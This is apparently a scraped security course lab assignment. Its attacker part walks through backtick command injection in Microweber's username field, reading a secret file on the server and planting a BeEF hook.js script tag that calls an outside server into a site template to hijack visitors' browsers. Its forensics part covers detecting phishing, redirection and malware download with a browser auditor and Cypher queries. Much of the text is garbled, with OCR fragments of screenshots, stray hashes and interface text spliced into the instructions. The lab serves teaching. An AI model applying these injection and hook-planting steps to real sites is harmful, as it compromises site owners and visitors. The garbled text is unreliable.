Note: Please make sure you have a GUI-enabled Linux OS (e.g., Ubuntu VM, WSL) to work on this project.Table of contentsDisclaimersObjectivesChecklist of Downloaded Project FilesTasksRole 1 – Attacker (45%)Task 1.1: Exploit Discovery (15%)Task 1.2: Compromise (30%)Role 2 – Forensics Investigator (55%)Task 2.1: Auditor Tool Development (25%)Task 2.2: Attack Investigation (30%) SubmissionWe are always looking to improve our homework assignments. If you see any errors, whether they are grammatical or technical, please report them on Ed Discussion. If anything is not clearly stated, please contact the TAs.With this project, you will be able to understand the big picture of how common web attacks can happen in the real world by playing two roles typically involved in the attack:Role 1 – Attacker (45%)During reconnaissance, you found the following information.With these insights, you made a smart plan to mess with Bob and his clients.Without further due. Let’s get started!After you have got the membership, you are permitted to register as an admin to further use the Microweber service.Note: if later you accidentally crash the services (likely to happen when you test out your code injection w/ illegal payload), you can always come back to this page, stop and start the services again to get a fresh environment.Control your containers using these buttonsbeefContaincrStatus: createdUpdated at: Nov. 5, 2023, 2:07 a.m. beefwebContainerStatus: createdUpdated at: Nov. 5, 2023, 2:07 a.m. microweber targetBob’s webpageLogin InformationAdmin username Admin emailAdmin password Repeat passwordUpdate nofiticationIf checked, you will get update notifications when new version is avaiable.Show advanced optionsInstall(D Microweber16%Installing module DB: RatingTask 1.1: Exploit Discovery (15%)BackgroundWhat happens under the hood is that when you log in after registration, before the server delivers your profile page, it first constructs your profile page by dynamically filling the value of the username field in a profile page template with your username retrieved from the database.between two backticks , will be treated as a shell command on Linux. Location of backtick on the keyboard.Combined with those two features, can we do something nasty? The answer is YES! As you probably have figured out, you can set your username as {C malicious code does something nasty’}} so that your “username” will be parsed and executed as code and do nasty stuff during the profile page construction on the server. A common practice to prevent this type of attack is to sanitize user inputs by turning them into inexecutable strings. However, sanitizations are not always correctly implemented. The Microweber website is an example — one of the user input fields lacks proper sanitization and is vulnerable to code injection attacks.Steps:< BackDashboard UsersWebsiteManage your usersUserMarketplaceStep 2SettingsUsers Step 1Website Builder by Microweber Version: 1.3.2Edit user Saveouser imageFill in the fields to create a new userUsernamePassword Change PasswordPersonal data of the uÉerFirst NameLast Name< BackUsersManage your usersCreate and manage users /var/www/htmlEdit profile/tmp/secret_l. txt on the server, see the example below. Submit this hash string to QI.I in the questionnaire. (Note: If you see two identical hashes, just submit one. This may happen due to that the injected data field is accessed twice during page construction.)oYou are logged in asb06c8b2c83b223834d18795da692f699fb153195f7e3c800f1721 fcbe87c6cf533b7d3456f990c058786f48edffca9588cb41fOa8403917b6d85f99431728f78UserEdit profileTask 1.2: Compromise (30%)DescriptionThe ability to run a command on the web server implies that you may do more on the web server, including modifying Bob’s website. In this task, your goal is to insert a malicious script payload into a template HTML file used by Bob’s website. Webpages Bob’s website imports the infected template, hence being infected as well. In this way, Bob’s clients get compromised when visiting his webpages.characters (e.g., ) in your submission will cause a mismatch and lead to O pts during autograding.0 You can use the Linux find command to search for Bob’s directory. You can use (root location) or (parent folder) as the search location to help you.o In the example below, your answer submitted to QI.2.1 should beclients assets$ find / -iname client_md5Result: /xx/xx/clients assets/ client md5<script src=”http://cs6264.gtisc . gatech . edu: YOUR_BEEF_PORT / hook.js”></script>cs6264.gtisc.gatech.ed 39069 ui/panelFind your BeEF port number here.Hints:wcbContainerStatus: created Updated at: Nov. 5, 2023, 2:07 a.m. microweber targetBob’s webpageEventOffline Browsers Social Engineering Google Phishing attack and observe what happens to Bob’s webpage.About Google Mail New features! Switch to Google Mail Create an accountTake Google Mail to work with Google Apps for BusinessLove Google Mail, but looking for a custom email address for your company?Get business email, calendar, and online docs Learn more2016 Google Google Mail for work Terms & privacy Help f4bc7d6edccec46c71a15f5b5cf4bcbaObbbb2b2936641cae360bf7d04ea65c5c27edb49731c57df52449ef3fc14eb59bcfe5d4d9d9f546c81b23fa9f24840faRubricCongratulations! At this point, you have successfully deployed and tested the attack. Now it’s time to look at this story from the point of view of another crucial role — the forensics investigator. As a forensics investigator, your job is to find the evidence of any attacks that happened to a victim. To approach this goal, you come up with the following plan:Task 2.1: Auditor Tool Development (25%)DescriptionIn the first step, you need to develop a handy tool to log and model the activities happening in the browser. To help take away the engineering burden from you, we have helped you implement most of the auditing tool (however, you are encouraged to go through all the code), so that you can focus more on learning the concepts and philosophy of modeling browser activities we provide in the supplementary document.Steps:pychrome Public @ Watch 12branches 3 tagsYou need a Linux system with GUI support (It is highly recommended to use Ubuntu)Make sure you have Python3 and Chrome installed.Install required packages: pip3 install – -upgrade && pip3 install requirements . txtRun Chrome with auditor listening on the events: python3 auditor. py Make sure you do not have a running Chrome instance when running the auditor. To save the hassle of repetitively copying and pasting the URL to Bob’s page to the browser GUI during testing for you, we provide a flag – -init-page which automatically opens the URL you specify when the browser starts. The usage is python3 auditor. py – -init-page s_PAGEThen the auditor starts logging the events. If you see a series of 3 events: 1) request, 2) response, and 3) script parsed repetitively shows up, it is the heartbeat sent back and forth between the remote hook and the BeEF server.Compress the generated logs to tar . gz file with the name username]_cs6264_1ab . tar . gz and submit it to Gradescope along with the questionnaire. Note: submission in the wrong format will lead to O pts.$ tar -t f username_cs6264_1ab . tar gzFrameNode . tsvFrame_compile_Script _Edge . tsvFrame_request_Resource_Edge . tsv ResourceNode . tsvResource_respond_Frame_Edge . tsvHaving additional logs files is fine (which may be generated by your browser extensions if you have any) as long as the submitted logs contain those from Bob’s page.RubricQuestion Deliverable CreditsQ2.1.1 Completed event _handler . py 15 %Q2.1.2 Logs of Bob’s clean pageTask 2.2: Attack Investigation (30%)DescriptionCongratulations! You have completed the key component of this project. Now that you can collect the logs, what’s left is to connect those information pieces in the log together to recover the whole picture of what happened during compromised browsing sessions, and find the evidence of attacks in the constructed causality graph. In this task, you need to execute and record logs for three common types of attacks: phishing, fake notification, and browser redirection from BeEF:Once you have collected logs containing those attacks, your next step is to construct a causality graph, and then find the evidence of those attacks in the graph through queries.Note: These three attacks do not have side effects on your browser. To complete this project, we recommend only playing with these 3 attacks. Other attacks could have an impact on your browser.For each attack:(ne04j’s query language) to locate this pattern in the graph. Please see the Supplementary Document for the detailed guide.Based on this logo’s URL, construct a query that returns a Frame request Resource subgraph where the resource node’s URL points to the Gmail favicon in the causality graph, as shown. Submit your query to Q2.2.1 in the questionnaire. Note that:Node DetailsResource332id “c55dc3b5b6dcf364ae24 39ab739edb66”type “Other” u rlExample query response indicating potential Google Phishing attack.Results OverviewNodes (2)Relationship (1) download (1)Example query response indicating potential malware downloading.www . example . com ) as opposed to (e.g., www . example . com/xxx/xxx/ ). With this observation, you can further restrict your query by adding a condition — the frame nodes’ security_origin is the same as its url Note the detail that the security_origin does not have the in the end. To perform string operations, you can find help from string functions and scalar functions in cypher. As shown in the example below, your query should return thepattern Script — create Frame where frame nodes’ security_origin is the same as its url except the last character. Submit your query to Q2.2.3 in the questionnaire.Node DetailsFrame252BEF8534396AC7″ Example query response indicating potential site redirection.Note:URL), your other two queries must be generalizable, meaning that they should catch attacks in the real world demonstrating the same behavior patterns (e.g., downloading real malware, redirection to URLs other than the example one). Failing to do so will result in O pts if your last two queries are not general.RubricDeliverablesImportant Note:
Shopping Cart
Reviews
There are no reviews yet.